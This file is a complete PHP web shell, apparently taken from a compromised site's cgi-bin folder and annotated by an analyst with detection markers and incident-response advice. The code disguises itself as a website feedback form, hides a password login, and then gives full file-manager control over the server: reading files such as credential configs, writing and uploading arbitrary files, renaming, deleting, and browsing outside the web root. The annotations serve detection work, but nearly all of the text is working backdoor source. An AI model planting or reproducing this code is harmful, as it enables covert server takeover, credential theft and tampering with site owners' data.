• File: index.php
  • Full Path: /home2/branding/public_html/shreeenterprisesepoxy.in/cgi-bin/559676/index.php
  • File size: 10.81 KB
  • MIME-type: text/x-php
  • Charset: utf-8
<?php
// Start session
// Analyst note: the PHP session is the only state this script keeps. The
// 'authenticated' flag stored in it is what separates the decoy page from the
// file manager further down.
session_start();

// Handle logout request
// Any request carrying a `logout` query parameter clears the flag and
// redirects back to this script, so the decoy page is served again.
if (isset($_GET['logout'])) {
    unset($_SESSION['authenticated']);
    header("Location: " . $_SERVER['PHP_SELF']);
    exit;
}

// Check if authenticated
// Analyst note: this is the access gate of the backdoor. Everything below this
// block is reachable only when $_SESSION['authenticated'] is exactly true.
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
    // Handle login request
    // The password is a static string stored in plaintext in the file, so
    // anyone who can read this file can log in. No rate limiting or lockout
    // is visible in this script.
    if (isset($_POST['password']) && $_POST['password'] === 'secretpassword') {
        $_SESSION['authenticated'] = true;
        header("Location: " . $_SERVER['PHP_SELF']);
        exit;
    } else {
        // Display disguised feedback form page
        // The 'username', 'email' and 'feedback' fields are never read anywhere
        // in this script; the form exists only to make the page look benign.
        echo "<h2>Website Feedback Form</h2>";
        echo "<p>Please fill out the form below to send us your feedback.</p>";
        echo "<form method='POST' action=''>";
        echo "<input type='text' name='username' placeholder='Your Name' /><br>";
        echo "<input type='email' name='email' placeholder='Your Email' /><br>";
        echo "<textarea name='feedback' placeholder='Your Feedback'></textarea><br>";
        echo "<input type='submit' value='Submit' />";
        echo "</form>";
        // The real login form is present in the HTML but hidden with
        // display:none until the "Contact Support" link is clicked.
        // Detection: a response that contains both the "Website Feedback Form"
        // heading and a hidden <div id='login-form'> with a password input is
        // a stable content marker for this file.
        echo "<p><a href='#' onclick='showLoginForm()'>Contact Support</a></p>";
        echo "<div id='login-form' style='display: none;'>";
        echo "<form method='POST' action=''>";
        echo "<input type='password' name='password' placeholder='Password' />";
        echo "<input type='submit' value='Login' />";
        echo "</form>";
        echo "</div>";
        echo "<script>";
        echo "function showLoginForm() {";
        echo "document.getElementById('login-form').style.display = 'block';";
        echo "}";
        echo "</script>";
        // Detection: POST requests to this path whose body has a `password`
        // field are login attempts; a failed attempt returns the literal
        // text "Invalid password." on the decoy page.
        if (isset($_POST['password'])) {
            echo "<p style='color: red;'>Invalid password.</p>";
        }
        exit;
    }
}

// File management functionality (accessible only after authentication)

// Display random string for obfuscation
// Returns 96 bytes from random_bytes() as a 192-character hex string.
// Analyst note: the value is freshly generated on every call, so every
// authenticated response body differs. Hashing whole responses will not match
// this page; match on the fixed strings around it instead.
function randomFunction() {
    $randomString = bin2hex(random_bytes(96));
    return $randomString;
}

// Print the per-request random value at the top of the authenticated page.
// The "Random String: " label itself is constant and can serve as a marker.
$randomString = randomFunction();
echo "<p style='color: green;'>Random String: $randomString</p>";

// Display system information
// Prints the php_uname() string and the PHP version to the page.
// Analyst note: this discloses host and runtime details to whoever holds the
// session. During incident response, assume this information is known to the
// operator of the backdoor.
function systemCheck() {
    $info = php_uname();
    $phpVersion = phpversion();
    echo "<p style='color: green;'>System Info: $info | PHP Version: $phpVersion</p>";
}

// Runs on every authenticated request, before any command handling.
systemCheck();

// Literal text that is only ever interpolated into link and button labels in
// this script; it is never URL-decoded or passed to a filesystem call here.
// Analyst note: because it is printed verbatim in the HTML, the sequence is a
// stable string to search for in response bodies and in copies of this file.
$special_chars = "%00%0A%09//#";

// Command encoding and decoding functions
// Wraps a command string ("navigate|<path>" or "action|<verb>|<dir>|<name>")
// in base64 for use as the `data` query parameter.
// Analyst note: this is encoding only, with no key and no signature, so the
// tokens in web-server access logs can be decoded to reconstruct which paths
// were browsed, edited, renamed or deleted. Derived by the reviewer from the
// literals in this file: tokens for "navigate|" begin with "bmF2aWdhdGV8" and
// tokens for "action|" begin with "YWN0aW9uf".
function encodeCommand($command) {
    return base64_encode($command);
}

// Inverse of encodeCommand(): base64-decodes the `data` parameter.
// Analyst note: the decoded value comes straight from the request and is not
// validated here; callers split it on '|' and use the pieces as paths.
function decodeCommand($encoded) {
    return base64_decode($encoded);
}

// Display directory listing
// Lists the entries of $path (minus '.' and '..') as HTML. Directories link to
// a "navigate" token; files get Edit / Delete / Rename links carrying "action"
// tokens.
// Analyst note: $path comes from the request and no base directory is
// enforced in this script, so any directory the web-server user can read can
// be listed. $path and $item are echoed into the HTML without escaping.
function displayDirectory($path) {
    global $special_chars;
    $items = array_diff(scandir($path), ['.', '..']);
    echo "<h3 style='color: green;'>Current Directory: $path</h3><ul>";
    foreach ($items as $item) {
        // realpath() resolves symlinks, so a linked directory is presented
        // under its resolved target path in the navigate token.
        $itemPath = realpath($path . DIRECTORY_SEPARATOR . $item);
        if (is_dir($itemPath)) {
            $navigateCommand = encodeCommand('navigate|' . $itemPath);
            echo "<li><a href='?data=$navigateCommand'>$item</a></li>";
        } else {
            // File actions carry the directory and file name as separate
            // fields; handlers re-join them with DIRECTORY_SEPARATOR.
            $editCommand = encodeCommand('action|edit|' . $path . '|' . $item);
            $deleteCommand = encodeCommand('action|delete|' . $path . '|' . $item);
            $renameCommand = encodeCommand('action|rename|' . $path . '|' . $item);
            echo "<li>$item <a href='?data=$editCommand'>$special_chars Edit</a> | 
                          <a href='?data=$deleteCommand'>$special_chars Delete</a> | 
                          <a href='?data=$renameCommand'>$special_chars Rename</a></li>";
        }
    }
    echo "</ul>";
}

// Handle file upload
// Moves the uploaded 'file' part into $path under its client-supplied base
// name and prints a success or failure message.
// Analyst note: there is no check on extension, MIME type or size here, and
// $path is request-controlled. During incident response, treat every file
// created under the web root since this script appeared as suspect, since
// further scripts could have been placed through this function.
function handleFileUpload($path) {
    if (!empty($_FILES['file']['name'])) {
        // basename() strips directory components from the client file name only;
        // the destination directory itself is not constrained.
        $target = $path . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']);
        if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
            echo "<p style='color: green;'>File uploaded successfully!</p>";
        } else {
            echo "<p style='color: red;'>Failed to upload file.</p>";
        }
    }
}

// Create new folder
// Creates a directory named by the 'folder_name' POST field inside $path,
// unless something already exists at that location.
// Analyst note: the field is concatenated into the path without basename() or
// any other filtering, and is echoed back into the page unescaped.
function createNewFolder($path) {
    if (!empty($_POST['folder_name'])) {
        $folderPath = $path . DIRECTORY_SEPARATOR . $_POST['folder_name'];
        if (!file_exists($folderPath)) {
            // The return value of mkdir() is not checked; the success message
            // is printed either way.
            mkdir($folderPath);
            echo "<p style='color: green;'>Folder created: {$_POST['folder_name']}</p>";
        } else {
            echo "<p style='color: red;'>Folder already exists.</p>";
        }
    }
}

// Create new file
// Creates an empty file named by the 'file_name' POST field inside $path,
// unless something already exists at that location.
// Analyst note: combined with the edit handler, this lets the session holder
// create a file of any name and then fill it with arbitrary content. The
// field is not filtered and is echoed back unescaped.
function createNewFile($path) {
    if (!empty($_POST['file_name'])) {
        $filePath = $path . DIRECTORY_SEPARATOR . $_POST['file_name'];
        if (!file_exists($filePath)) {
            // The return value of file_put_contents() is not checked.
            file_put_contents($filePath, '');
            echo "<p style='color: green;'>File created: {$_POST['file_name']}</p>";
        } else {
            echo "<p style='color: red;'>File already exists.</p>";
        }
    }
}

// Display file edit form
// Reads the file at $filePath (empty string if it does not exist),
// HTML-escapes the content and shows it in a textarea whose form posts back
// to the matching "action|edit" token.
// Analyst note: this is also an arbitrary file read. Any file the web-server
// user can read, such as application configuration holding database or API
// credentials, can be viewed through it. Treat such secrets as exposed and
// rotate them.
function displayEditForm($filePath, $path) {
    $content = file_exists($filePath) ? htmlspecialchars(file_get_contents($filePath)) : '';
    echo "<form method='POST' action='?data=" . encodeCommand('action|edit|' . $path . '|' . basename($filePath)) . "'>
            <textarea name='content' style='width:100%; height:300px;'>$content</textarea><br>
            <button type='submit'>Save</button>
          </form>";
}

// Delete file
// Removes the file at $filePath with unlink() and prints the outcome.
// Analyst note: the caller invokes this from the GET handler, so deletions
// appear in access logs as plain GET requests whose `data` token decodes to
// "action|delete|<dir>|<name>". That gives a record of what was removed even
// when request bodies are not logged.
function deleteFile($filePath) {
    if (file_exists($filePath)) {
        if (unlink($filePath)) {
            echo "<p style='color: green;'>File deleted successfully.</p>";
        } else {
            echo "<p style='color: red;'>Failed to delete file.</p>";
        }
    } else {
        echo "<p style='color: red;'>File does not exist.</p>";
    }
}

// Display rename form
// Prints a form with a 'new_name' text field that posts to the matching
// "action|rename" token for the item.
// Analyst note: only the form is produced here; the rename itself happens in
// the POST handler.
function displayRenameForm($itemPath, $path) {
    echo "<form method='POST' action='?data=" . encodeCommand('action|rename|' . $path . '|' . basename($itemPath)) . "'>
            <input type='text' name='new_name' placeholder='New Name'>
            <button type='submit'>Rename</button>
          </form>";
}

// Handle POST requests
// Dispatches state-changing operations. The `data` query parameter is
// base64-decoded and split on '|' into at most four fields: either
// "action|<verb>|<dir>|<name>" or "navigate|<dir>".
// Analyst note: every path used below is taken from the request without
// canonicalisation or a base-directory check, so writes and renames can reach
// any location the web-server user can modify. In logs these are POST requests
// with a `data` parameter; the token reveals the target path even when the
// body is not recorded.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_GET['data'])) {
        $command = decodeCommand($_GET['data']);
        $parts = explode('|', $command, 4);
        if ($parts[0] == 'action' && $parts[1] == 'edit') {
            $path = $parts[2];
            $item = $parts[3];
            $itemPath = $path . DIRECTORY_SEPARATOR . $item;
            if (isset($_POST['content'])) {
                // Arbitrary file write: overwrites (or creates) $itemPath with
                // the posted content. Existing site files could have been
                // modified through this branch; compare them against a known
                // good copy rather than trusting modification times alone.
                file_put_contents($itemPath, $_POST['content']);
                echo "<p style='color: green;'>File updated successfully!</p>";
            }
        } elseif ($parts[0] == 'action' && $parts[1] == 'rename') {
            $path = $parts[2];
            $item = $parts[3];
            $itemPath = $path . DIRECTORY_SEPARATOR . $item;
            if (isset($_POST['new_name'])) {
                // 'new_name' is concatenated unfiltered, so the destination is
                // not limited to the source directory.
                $newPath = $path . DIRECTORY_SEPARATOR . $_POST['new_name'];
                if (rename($itemPath, $newPath)) {
                    echo "<p style='color: green;'>Item renamed successfully.</p>";
                } else {
                    echo "<p style='color: red;'>Failed to rename item.</p>";
                }
            }
        } elseif ($parts[0] == 'navigate') {
            // POSTs to a "navigate" token are the upload / create-folder /
            // create-file forms shown on the directory page.
            $path = $parts[1];
            if (isset($_FILES['file'])) {
                handleFileUpload($path);
            } elseif (isset($_POST['folder_name'])) {
                createNewFolder($path);
            } elseif (isset($_POST['file_name'])) {
                createNewFile($path);
            }
        }
        // Redirect back to the directory listing. Status messages are echoed
        // before this header() call.
        $navigateCommand = encodeCommand('navigate|' . $path);
        header("Location: ?data=$navigateCommand");
        exit;
    }
}

// Handle GET requests
// Renders the file-manager UI. With a `data` token it shows either a directory
// page ("navigate") or performs or prepares a file action ("action"); without
// one it starts in the script's current working directory.
// Analyst note: delete is executed on a GET request, so it is triggered by
// following a link and leaves its target path in the access log query string.
if (isset($_GET['data'])) {
    $command = decodeCommand($_GET['data']);
    $parts = explode('|', $command, 4);
    if ($parts[0] == 'navigate') {
        $path = $parts[1];
        // "Go Up" links to dirname($path); nothing here stops navigation above
        // the web root.
        $parentPath = dirname($path);
        $goUpCommand = encodeCommand('navigate|' . $parentPath);
        echo "<a href='?data=$goUpCommand'>$special_chars Go Up</a>";
        displayDirectory($path);
        // The three forms below all POST to the same "navigate" token; the
        // POST handler tells them apart by which field is present.
        echo "<h3 style='color: green;'>Upload File</h3>
              <form method='POST' enctype='multipart/form-data' action='?data=" . encodeCommand('navigate|' . $path) . "'>
                <input type='file' name='file'><button type='submit'>$special_chars Upload</button>
              </form>";
        echo "<h3 style='color: green;'>Create Folder</h3>
              <form method='POST' action='?data=" . encodeCommand('navigate|' . $path) . "'>
                <input type='text' name='folder_name' placeholder='Folder Name'><button type='submit'>$special_chars Create</button>
              </form>";
        echo "<h3 style='color: green;'>Create File</h3>
              <form method='POST' action='?data=" . encodeCommand('navigate|' . $path) . "'>
                <input type='text' name='file_name' placeholder='File Name'><button type='submit'>$special_chars Create</button>
              </form>";
    } elseif ($parts[0] == 'action') {
        $action = $parts[1];
        $path = $parts[2];
        $item = $parts[3];
        $itemPath = $path . DIRECTORY_SEPARATOR . $item;
        if ($action == 'delete') {
            // State change on GET: the file is unlinked, then the client is
            // redirected to the containing directory's listing.
            deleteFile($itemPath);
            $navigateCommand = encodeCommand('navigate|' . $path);
            header("Location: ?data=$navigateCommand");
            exit;
        } elseif ($action == 'edit') {
            // Shows the file's current content (file read).
            displayEditForm($itemPath, $path);
        } elseif ($action == 'rename') {
            displayRenameForm($itemPath, $path);
        }
    }
} else {
    // Landing view after login: list getcwd(), with the same upload and
    // create forms as the "navigate" branch above.
    $path = getcwd();
    $parentPath = dirname($path);
    $goUpCommand = encodeCommand('navigate|' . $parentPath);
    echo "<a href='?data=$goUpCommand'>$special_chars Go Up</a>";
    displayDirectory($path);
    echo "<h3 style='color: green;'>Upload File</h3>
          <form method='POST' enctype='multipart/form-data' action='?data=" . encodeCommand('navigate|' . $path) . "'>
            <input type='file' name='file'><button type='submit'>$special_chars Upload</button>
          </form>";
    echo "<h3 style='color: green;'>Create Folder</h3>
          <form method='POST' action='?data=" . encodeCommand('navigate|' . $path) . "'>
            <input type='text' name='folder_name' placeholder='Folder Name'><button type='submit'>$special_chars Create</button>
          </form>";
    echo "<h3 style='color: green;'>Create File</h3>
          <form method='POST' action='?data=" . encodeCommand('navigate|' . $path) . "'>
            <input type='text' name='file_name' placeholder='File Name'><button type='submit'>$special_chars Create</button>
          </form>";
}

// Add logout link
// Links to ?logout=1, which the handler at the top of the script uses to drop
// the session flag. Requests with a `logout` parameter to this path therefore
// mark the end of an operator session in the access log.
echo "<br><a href='?logout=1'>Logout</a>";
?>